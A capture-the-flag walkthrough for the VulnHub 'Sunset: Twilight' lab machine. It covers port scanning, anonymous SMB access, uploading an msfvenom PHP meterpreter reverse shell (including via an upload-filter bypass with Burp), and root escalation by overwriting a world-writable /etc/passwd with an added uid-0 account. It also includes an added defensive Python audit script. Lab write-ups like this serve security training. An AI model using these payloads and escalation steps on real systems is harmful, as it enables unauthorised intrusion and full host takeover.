PJzhang: VulnHub target machine, sunset series, SUNSET: TWILIGHT
猫宁~~~
Address: https://www.vulnhub.com/entry/sunset-twilight,512/
Focus on the tools and the approach.
nmap 192.168.43.0/24
Target IP
192.168.43.164
nmap -A -p1-65535 192.168.43.164
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later
enum4linux 192.168.43.164
WRKSHARE Disk Workplace Share. Do not access if not an employee.
smbclient //192.168.43.164/WRKSHARE, log in with no password
smb: \>
cd \var\www\html
smb: \var\www\html\>
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
Upload muma.php over SMB
smb: \var\www\html\> put muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
Browse to http://192.168.43.164/muma.php to trigger the reverse shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$
cd /home
Shows that a user miguel exists
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
ls -al /etc/passwd shows it is readable and writable by everyone
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd
Run on the attacker machine
openssl passwd -1 -salt useruser 123456
Copy the target's /etc/passwd to the local machine
Append as the last line
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash
python3 -m http.server 80
wget http://192.168.43.154/passwd -O /etc/passwd
su useruser
id
uid=0(root) gid=0(root) groups=0(root)
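A defender-side check for the two weaknesses this section abuses (an /etc/passwd writable by non-root users, and a uid-0 entry that carries its own hash instead of deferring to /etc/shadow). This is an added example, not part of the original write-up; the sample file contents are constructed from the lines above.

```python
import os
import stat

# Constructed sample of a passwd file tampered with in the way the walkthrough
# shows: a second uid-0 account whose hash sits directly in field 2.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash
"""

# Values in field 2 that mean "password is in /etc/shadow" or "account locked".
SHADOWED = {"x", "*", "!", "!!", ""}


def audit_passwd_text(text):
    """Return (line number, finding, account) tuples for passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            findings.append((lineno, "unparseable", line))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # Any uid-0 account other than root is a backdoor candidate.
        if uid == "0" and name != "root":
            findings.append((lineno, "extra-uid0", name))
        # A hash stored in passwd itself bypasses /etc/shadow entirely.
        if pw not in SHADOWED:
            findings.append((lineno, "hash-in-passwd", name))
        # Well-formed entries have exactly seven colon-separated fields.
        if len(fields) != 7:
            findings.append((lineno, "field-count", name))
    return findings


def mode_is_group_or_world_writable(mode):
    """True if a stat mode grants write to group or others (the -rwxrwxrwx case)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path="/etc/passwd"):
    """Audit a live file: content findings plus a permissions finding."""
    with open(path) as fh:
        findings = audit_passwd_text(fh.read())
    if mode_is_group_or_world_writable(os.stat(path).st_mode):
        findings.append((0, "writable-by-non-root", path))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd_file():
        print(finding)
```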
Getting a shell through the upload interface
dirb http://192.168.43.3/
http://192.168.43.3/gallery/
http://192.168.43.3/gallery/original/ exposes a browsable directory listing, which for example shows the uploaded muma.php
Rename muma.php to muma.php.pjpeg
Upload it and intercept the request with Burp Suite,
Content-Type: image/jpeg
change the filename back to muma.php
Upload succeeds
http://192.168.43.3/gallery/original/muma.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
Shell obtained